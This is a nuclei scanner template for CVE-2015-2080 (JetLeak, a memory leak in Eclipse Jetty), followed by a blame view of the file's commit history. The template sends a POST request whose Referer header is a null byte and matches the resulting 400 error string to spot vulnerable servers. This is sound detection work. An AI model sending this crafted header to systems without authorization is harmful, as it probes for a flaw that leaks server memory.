nuclei-templates/cves/2015/CVE-2015-2080.yaml

id: CVE-2015-2080

info:
  name: Eclipse Jetty Remote Leakage
  author: pikpikcu
  severity: medium
  reference:
    - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
    - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
    - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
  description: |
    The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
  tags: cve,cve2015,jetty

requests:
  - method: POST
    path:
      - "{{BaseURL}}"
    headers:
      Referer: \x00

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 400
      - type: word
        words:
          - "Illegal character 0x0 in state"
        part: body
Create CVE-2015-2080.yaml 2021-03-06 14:06:03 +00:00			`id: CVE-2015-2080`

			`info:`
			`name: Eclipse Jetty Remote Leakage`
			`author: pikpikcu`
			`severity: medium`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Description and references 2021-04-22 09:04:36 +00:00			`- https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md`
			`- https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html`
			`- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html`
Create CVE-2015-2080.yaml 2021-03-06 14:06:03 +00:00			`description: \|`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak`
Adding missing tags 2021-05-12 19:24:59 +00:00			`tags: cve,cve2015,jetty`
Create CVE-2015-2080.yaml 2021-03-06 14:06:03 +00:00
			`requests:`
			`- method: POST`
			`path:`
misc updates 2021-08-02 07:23:35 +00:00			`- "{{BaseURL}}"`
Create CVE-2015-2080.yaml 2021-03-06 14:06:03 +00:00			`headers:`
Update CVE-2015-2080.yaml 2021-03-17 08:39:56 +00:00			`Referer: \x00`
Create CVE-2015-2080.yaml 2021-03-06 14:06:03 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 400`
			`- type: word`
			`words:`
			`- "Illegal character 0x0 in state"`
Update CVE-2015-2080.yaml 2021-03-07 11:19:03 +00:00			`part: body`